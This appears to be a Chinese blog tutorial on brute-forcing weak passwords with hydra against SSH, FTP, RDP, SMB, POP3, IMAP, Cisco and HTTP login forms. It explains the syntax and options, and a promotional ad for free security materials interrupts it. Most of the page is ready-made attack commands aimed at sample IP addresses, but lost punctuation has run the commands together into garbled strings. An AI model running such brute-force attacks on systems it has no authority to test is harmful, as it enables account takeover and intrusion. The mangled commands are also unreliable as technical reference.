使用hydra对端口进行爆破

　　2022年，网站的防护（sql，xss。。。）的安全保护也已经上升了一个等级，但是由于管理员的安全意识薄弱，网站弱口令漏洞依然猖獗，不信可以看补天的漏洞提交记录，弱口令依然是漏洞中的佼佼者，当然弱口令并不仅限于网站的后台登陆弱口令，还有端口，比如Ftp：21，ssh：22，Telnet：23，Pop3：110，3389远程登陆，8080中间件Tomcat，7001中间件Weblogic，3306Mysql数据库（phpmyadmin），1433SQLServer数据库，5432Postgresql数据库。。。
　　端口扫描不用多讲，鄙人还是觉得nmap好一点，但是如何批量扫的话，丢包率可能高一点。
　　对于端口的爆破，首先要有一个好的字典，然后再有一个好的工具，工具的话，python脚本，超级弱口令检测工具。。。。这里主要介绍kali里面hydra的爆破，应为hydra支持几乎所有协议的在线密码破解，并且容错率好，不过能不能爆破成功还是需要你有一个好的字典。
　　语法：hydra〔〔〔lLOGINLFILE〕〔pPASSPFILE〕〕〔CFILE〕〕〔ens〕〔oFILE〕〔tTASKS〕〔MFILE〔TTASKS〕〕〔wTIME〕〔f〕〔sPORT〕〔S〕〔vV〕serverservice〔OPT〕
　　参数详解：R根据上一次进度继续破解S使用SSL协议连接s指定端口l指定用户名L指定用户名字典（文件）p指定密码破解P指定密码字典（文件）e空密码探测和指定用户密码探测（ns）MFILE指定目标列表文件一行一条f在使用M参数以后，找到第一对登录名或者密码的时候中止破解。C用户名可以用：分割（username：password）可以代替lusernameppasswordoFILE输出文件t指定多线程数量，默认为16个线程wTIME设置最大超时的时间，单位秒，默认是30svV显示详细过程server目标IPservice指定服务名（telnetftppop3mssqlmysqlsshssh2。。。。。。）
　　200多本网络安全系列电子书
　　网络安全标准题库资料
　　项目源码
　　网络安全基础入门、Linux、web安全、攻防方面的视频
　　网络安全学习路线图
　　私信安全免费领取10使用案例：
　　爆破ssh：22端口命令：hydraLusers。txtPpassword。txtt5vVossh。txtens192。168。0。132ssh
　　爆破Ftp：21端口命令（指定用户名为root）：hydralrootPpassword。txtt5vVoftp。txtens192。168。0。132ftp
　　get方式提交，破解web登录（指定用户名为admin）：hydraLuser。txtppassword。txtt线程vVensiphttpgetadminhydraladminppassword。txtt线程vVensfiphttpgetadminindex。php
　　post方式提交，破解web登录：hydraladminPpassword。txts80iphttppostformadminlogin。php：usernameUSERpasswordPASSsubmitlogin：sorrypasswordhydrat3ladminPpass。txtoout。txtf10。36。16。18httppostformlogin。php：idUSERpasswdPASS：titlewrongusernameorpasswordtitle
　　参数说明：t同时线程数3，l用户名是admin，字典pass。txt，保存为out。txt，f当破解了一个密码就停止，10。36。16。18目标ip，httppostform表示破解是采用http的post方式提交的表单密码破解，中的内容是表示错误猜解的返回信息提示。
　　破解https：hydramindex。phpladminPpassword。txt192。168。0。132https
　　破解teamspeak：hydraladminPpassworrd。txts端口号vV192。168。0。132teamspeak
　　破解cisco：hydraPpassword。txt192。168。0。132ciscohydramcloudPpassword。txt192。168。0。132ciscoenable
　　破解smb：hydraladministratorPpassword。txt192。168。0。132smb
　　破解pop3：hydralrootPpassword。txtmy。pop3。mailpop3
　　破解rdp（3389端口）：hydraladministratorPpassword。txtV192。168。0。132rdp
　　破解httpproxy：hydraladminPpasswprd。txthttpproxy：192。168。0。132
　　破解imap：hydraLuser。txtpsecret192。168。0。132imapPLAINhydraCdefaults。txt6imap：〔fe80：：2c：31ff：fe12：ac11〕：143PLAIN
　　就先介绍到这里